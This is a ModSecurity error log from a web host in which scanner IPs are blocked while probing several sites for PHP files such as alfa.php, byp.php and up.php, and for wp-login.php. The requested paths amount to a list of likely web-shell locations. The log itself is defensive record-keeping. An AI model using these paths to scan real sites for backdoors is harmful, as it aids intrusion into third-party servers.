[Tue May 26 16:35:21.569302 2026] [security2:error] [pid 808625:tid 808809] [client 20.151.117.104:31182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/f35.php"] [unique_id "ahV-cTEl_SBaWibfDmpicAAAADY"]
[Tue May 26 16:35:21.569400 2026] [security2:error] [pid 808625:tid 808809] [client 20.151.117.104:31182] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/f35.php"] [unique_id "ahV-cTEl_SBaWibfDmpicAAAADY"]
[Tue May 26 16:35:21.643207 2026] [security2:error] [pid 808625:tid 808835] [client 130.131.224.225:62709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/explorer/index_.php"] [unique_id "ahV-cTEl_SBaWibfDmpicQAAAFA"]
[Tue May 26 16:35:21.643363 2026] [security2:error] [pid 808625:tid 808835] [client 130.131.224.225:62709] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/explorer/index_.php"] [unique_id "ahV-cTEl_SBaWibfDmpicQAAAFA"]
[Tue May 26 16:35:21.679195 2026] [security2:error] [pid 808625:tid 808861] [client 62.60.130.233:52605] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-login.php"] [unique_id "ahV-cTEl_SBaWibfDmpidQAAAGo"], referer: https://www.reddit.com/
[Tue May 26 16:35:21.714024 2026] [security2:error] [pid 808625:tid 808798] [client 20.151.117.104:25813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/gg.php"] [unique_id "ahV-cTEl_SBaWibfDmpidgAAACs"]
[Tue May 26 16:35:21.714138 2026] [security2:error] [pid 808625:tid 808798] [client 20.151.117.104:25813] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/gg.php"] [unique_id "ahV-cTEl_SBaWibfDmpidgAAACs"]
[Tue May 26 16:35:21.863757 2026] [security2:error] [pid 808625:tid 808866] [client 20.151.117.104:25810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/gifclass.php"] [unique_id "ahV-cTEl_SBaWibfDmpiegAAAG8"]
[Tue May 26 16:35:21.863866 2026] [security2:error] [pid 808625:tid 808866] [client 20.151.117.104:25810] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/gifclass.php"] [unique_id "ahV-cTEl_SBaWibfDmpiegAAAG8"]
[Tue May 26 16:35:21.979766 2026] [security2:error] [pid 808625:tid 808759] [client 130.131.224.225:64616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/error.php"] [unique_id "ahV-cTEl_SBaWibfDmpifQAAAAQ"]
[Tue May 26 16:35:21.979872 2026] [security2:error] [pid 808625:tid 808759] [client 130.131.224.225:64616] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/error.php"] [unique_id "ahV-cTEl_SBaWibfDmpifQAAAAQ"]
[Tue May 26 16:35:22.006841 2026] [security2:error] [pid 808625:tid 808817] [client 20.151.117.104:35839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/sql.php"] [unique_id "ahV-cjEl_SBaWibfDmpigAAAAD4"]
[Tue May 26 16:35:22.006944 2026] [security2:error] [pid 808625:tid 808817] [client 20.151.117.104:35839] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/sql.php"] [unique_id "ahV-cjEl_SBaWibfDmpigAAAAD4"]
[Tue May 26 16:35:22.150063 2026] [security2:error] [pid 808625:tid 808771] [client 20.151.117.104:9748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/up.php"] [unique_id "ahV-cjEl_SBaWibfDmpihAAAABA"]
[Tue May 26 16:35:22.150189 2026] [security2:error] [pid 808625:tid 808771] [client 20.151.117.104:9748] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/up.php"] [unique_id "ahV-cjEl_SBaWibfDmpihAAAABA"]
[Tue May 26 16:35:22.247737 2026] [security2:error] [pid 808625:tid 808853] [client 130.131.224.225:63998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/333.php"] [unique_id "ahV-cjEl_SBaWibfDmpiigAAAGI"]
[Tue May 26 16:35:22.247870 2026] [security2:error] [pid 808625:tid 808853] [client 130.131.224.225:63998] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/333.php"] [unique_id "ahV-cjEl_SBaWibfDmpiigAAAGI"]
[Tue May 26 16:35:22.293244 2026] [security2:error] [pid 808625:tid 808801] [client 20.151.117.104:31279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahV-cjEl_SBaWibfDmpiiwAAAC4"]
[Tue May 26 16:35:22.293371 2026] [security2:error] [pid 808625:tid 808801] [client 20.151.117.104:31279] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahV-cjEl_SBaWibfDmpiiwAAAC4"]
[Tue May 26 16:35:22.441831 2026] [security2:error] [pid 808625:tid 808827] [client 20.151.117.104:34828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-admin/about.php"] [unique_id "ahV-cjEl_SBaWibfDmpikQAAAEg"]
[Tue May 26 16:35:22.441927 2026] [security2:error] [pid 808625:tid 808827] [client 20.151.117.104:34828] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-admin/about.php"] [unique_id "ahV-cjEl_SBaWibfDmpikQAAAEg"]
[Tue May 26 16:35:22.586187 2026] [security2:error] [pid 808625:tid 808790] [client 20.151.117.104:2151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/function.php"] [unique_id "ahV-cjEl_SBaWibfDmpikgAAACM"]
[Tue May 26 16:35:22.586313 2026] [security2:error] [pid 808625:tid 808790] [client 20.151.117.104:2151] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/function.php"] [unique_id "ahV-cjEl_SBaWibfDmpikgAAACM"]
[Tue May 26 16:35:22.587075 2026] [security2:error] [pid 808625:tid 808821] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-cjEl_SBaWibfDmpigwAAAEI"]
[Tue May 26 16:35:22.653288 2026] [security2:error] [pid 808625:tid 808844] [client 130.131.224.225:63954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ftde.php"] [unique_id "ahV-cjEl_SBaWibfDmpimAAAAFk"]
[Tue May 26 16:35:22.653413 2026] [security2:error] [pid 808625:tid 808844] [client 130.131.224.225:63954] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ftde.php"] [unique_id "ahV-cjEl_SBaWibfDmpimAAAAFk"]
[Tue May 26 16:35:22.732041 2026] [security2:error] [pid 808625:tid 808846] [client 20.151.117.104:31237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV-cjEl_SBaWibfDmpimgAAAFs"]
[Tue May 26 16:35:22.732199 2026] [security2:error] [pid 808625:tid 808846] [client 20.151.117.104:31237] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV-cjEl_SBaWibfDmpimgAAAFs"]
[Tue May 26 16:35:22.821585 2026] [security2:error] [pid 808625:tid 808782] [client 130.131.224.225:63349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/app.php"] [unique_id "ahV-cjEl_SBaWibfDmpimwAAABs"]
[Tue May 26 16:35:22.821714 2026] [security2:error] [pid 808625:tid 808782] [client 130.131.224.225:63349] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/app.php"] [unique_id "ahV-cjEl_SBaWibfDmpimwAAABs"]
[Tue May 26 16:35:22.875608 2026] [security2:error] [pid 808625:tid 808795] [client 20.151.117.104:35794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahV-cjEl_SBaWibfDmpinwAAACg"]
[Tue May 26 16:35:22.875713 2026] [security2:error] [pid 808625:tid 808795] [client 20.151.117.104:35794] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahV-cjEl_SBaWibfDmpinwAAACg"]
[Tue May 26 16:35:22.981450 2026] [security2:error] [pid 808625:tid 808833] [client 130.131.224.225:64598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/cilus.php"] [unique_id "ahV-cjEl_SBaWibfDmpiowAAAE4"]
[Tue May 26 16:35:22.981549 2026] [security2:error] [pid 808625:tid 808833] [client 130.131.224.225:64598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/cilus.php"] [unique_id "ahV-cjEl_SBaWibfDmpiowAAAE4"]
[Tue May 26 16:35:23.018671 2026] [security2:error] [pid 808625:tid 808829] [client 20.151.117.104:2119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/66.php"] [unique_id "ahV-czEl_SBaWibfDmpipAAAAEo"]
[Tue May 26 16:35:23.018810 2026] [security2:error] [pid 808625:tid 808829] [client 20.151.117.104:2119] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/66.php"] [unique_id "ahV-czEl_SBaWibfDmpipAAAAEo"]
[Tue May 26 16:35:23.162283 2026] [security2:error] [pid 808625:tid 808841] [client 20.151.117.104:8438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV-czEl_SBaWibfDmpirAAAAFY"]
[Tue May 26 16:35:23.162384 2026] [security2:error] [pid 808625:tid 808841] [client 20.151.117.104:8438] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV-czEl_SBaWibfDmpirAAAAFY"]
[Tue May 26 16:35:23.263979 2026] [security2:error] [pid 808625:tid 808828] [client 130.131.224.225:65095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/a5.php"] [unique_id "ahV-czEl_SBaWibfDmpirQAAAEk"]
[Tue May 26 16:35:23.264074 2026] [security2:error] [pid 808625:tid 808828] [client 130.131.224.225:65095] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/a5.php"] [unique_id "ahV-czEl_SBaWibfDmpirQAAAEk"]
[Tue May 26 16:35:23.305410 2026] [security2:error] [pid 808625:tid 808878] [client 20.151.117.104:31275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/init.php"] [unique_id "ahV-czEl_SBaWibfDmpirgAAAHs"]
[Tue May 26 16:35:23.305539 2026] [security2:error] [pid 808625:tid 808878] [client 20.151.117.104:31275] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/init.php"] [unique_id "ahV-czEl_SBaWibfDmpirgAAAHs"]
[Tue May 26 16:35:23.449417 2026] [security2:error] [pid 808625:tid 808763] [client 20.151.117.104:31290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/byp.php"] [unique_id "ahV-czEl_SBaWibfDmpiuQAAAAg"]
[Tue May 26 16:35:23.449520 2026] [security2:error] [pid 808625:tid 808763] [client 20.151.117.104:31290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/byp.php"] [unique_id "ahV-czEl_SBaWibfDmpiuQAAAAg"]
[Tue May 26 16:35:23.453795 2026] [security2:error] [pid 808625:tid 808864] [client 130.131.224.225:63959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/test.php"] [unique_id "ahV-czEl_SBaWibfDmpiugAAAG0"]
[Tue May 26 16:35:23.453895 2026] [security2:error] [pid 808625:tid 808864] [client 130.131.224.225:63959] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/test.php"] [unique_id "ahV-czEl_SBaWibfDmpiugAAAG0"]
[Tue May 26 16:35:23.592797 2026] [security2:error] [pid 808625:tid 808785] [client 20.151.117.104:35815] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/index.php"] [unique_id "ahV-czEl_SBaWibfDmpiwAAAAB4"]
[Tue May 26 16:35:23.592886 2026] [security2:error] [pid 808625:tid 808785] [client 20.151.117.104:35815] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/index.php"] [unique_id "ahV-czEl_SBaWibfDmpiwAAAAB4"]
[Tue May 26 16:35:23.607766 2026] [security2:error] [pid 808625:tid 808838] [client 130.131.224.225:65080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahV-czEl_SBaWibfDmpiwQAAAFM"]
[Tue May 26 16:35:23.607881 2026] [security2:error] [pid 808625:tid 808838] [client 130.131.224.225:65080] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahV-czEl_SBaWibfDmpiwQAAAFM"]
[Tue May 26 16:35:23.680032 2026] [security2:error] [pid 808625:tid 808835] [client 123.20.244.80:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-czEl_SBaWibfDmpiqAAAAFA"]
[Tue May 26 16:35:23.742917 2026] [security2:error] [pid 808625:tid 808761] [client 20.151.117.104:34823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/index/chosen.php"] [unique_id "ahV-czEl_SBaWibfDmpiyAAAAAY"]
[Tue May 26 16:35:23.743025 2026] [security2:error] [pid 808625:tid 808761] [client 20.151.117.104:34823] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/index/chosen.php"] [unique_id "ahV-czEl_SBaWibfDmpiyAAAAAY"]
[Tue May 26 16:35:23.756357 2026] [security2:error] [pid 808625:tid 808790] [client 130.131.224.225:64531] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/term.php"] [unique_id "ahV-czEl_SBaWibfDmpiyQAAACM"]
[Tue May 26 16:35:23.756484 2026] [security2:error] [pid 808625:tid 808790] [client 130.131.224.225:64531] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/term.php"] [unique_id "ahV-czEl_SBaWibfDmpiyQAAACM"]
[Tue May 26 16:35:23.887937 2026] [security2:error] [pid 808625:tid 808778] [client 20.151.117.104:25828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/about/chosen.php"] [unique_id "ahV-czEl_SBaWibfDmpiygAAABc"]
[Tue May 26 16:35:23.888074 2026] [security2:error] [pid 808625:tid 808778] [client 20.151.117.104:25828] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/about/chosen.php"] [unique_id "ahV-czEl_SBaWibfDmpiygAAABc"]
[Tue May 26 16:35:23.998278 2026] [security2:error] [pid 808625:tid 808755] [client 130.131.224.225:62655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/file61.php"] [unique_id "ahV-czEl_SBaWibfDmpiywAAAAA"]
[Tue May 26 16:35:23.998438 2026] [security2:error] [pid 808625:tid 808755] [client 130.131.224.225:62655] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/file61.php"] [unique_id "ahV-czEl_SBaWibfDmpiywAAAAA"]
[Tue May 26 16:35:24.030502 2026] [security2:error] [pid 808625:tid 808823] [client 20.151.117.104:35783] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/as/chosen.php"] [unique_id "ahV-dDEl_SBaWibfDmpizAAAAEQ"]
[Tue May 26 16:35:24.030606 2026] [security2:error] [pid 808625:tid 808823] [client 20.151.117.104:35783] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/as/chosen.php"] [unique_id "ahV-dDEl_SBaWibfDmpizAAAAEQ"]
[Tue May 26 16:35:24.166397 2026] [security2:error] [pid 808625:tid 808816] [client 130.131.224.225:64571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/la.php"] [unique_id "ahV-dDEl_SBaWibfDmpi0AAAAD0"]
